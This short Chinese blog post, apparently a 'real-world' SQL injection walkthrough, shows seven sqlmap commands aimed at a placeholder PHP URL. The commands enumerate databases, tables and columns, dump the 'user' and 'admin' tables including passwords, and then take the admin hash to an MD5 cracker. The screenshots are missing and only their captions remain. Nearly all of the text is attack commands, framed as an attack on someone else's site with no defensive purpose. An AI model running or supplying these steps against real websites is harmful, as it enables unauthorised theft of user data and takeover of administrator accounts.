实战:某网站的SQL注入(php+mysql+Apache)

1.列出所有数据库
sqlmap -u “http://www.aaa.com/a.php?id=2” --dbs
在这里插入图片描述

2.列出数据库"hailc0218"的所有表
sqlmap -u “http://www.aaa.com/a.php?id=2” --tables -D"hailc0218"
实战:某网站的SQL注入(php+mysql+Apache)_第1张图片

3.列出数据库"hailc0218"表“user”的所有字段
sqlmap -u “http://www.aaa/a.php?id=2” --columns -T"user" -D"hailc0218"
实战:某网站的SQL注入(php+mysql+Apache)_第2张图片

4.列出数据库"hailc0218"表“user”的前20个“id”,“name”和“password”的数据
sqlmap -u “http://www.aaa.com/a.php?id=2” --dump -C"password,name,id" -T"user" -D"hailc0218" --start 1 --stop 20
实战:某网站的SQL注入(php+mysql+Apache)_第3张图片

5.列出数据库"hailc0218"表“admin”的所有字段
sqlmap -u “http://www.aaa.com/a.php?id=2” --columns -T"admin" -D"hailc0218"
实战:某网站的SQL注入(php+mysql+Apache)_第4张图片

6.列出数据库"hailc0218"表“admin”的所有数据
sqlmap -u “http://www.aaa.com/a.php?id=2” --dump -T"admin" -D"hailc0218"
实战:某网站的SQL注入(php+mysql+Apache)_第5张图片

7.发现admin账号的密码为0059xxxxxxxxxxxxxxx
拿去MD5解密
实战:某网站的SQL注入(php+mysql+Apache)_第6张图片

你可能感兴趣的:(渗透测试,sql注入)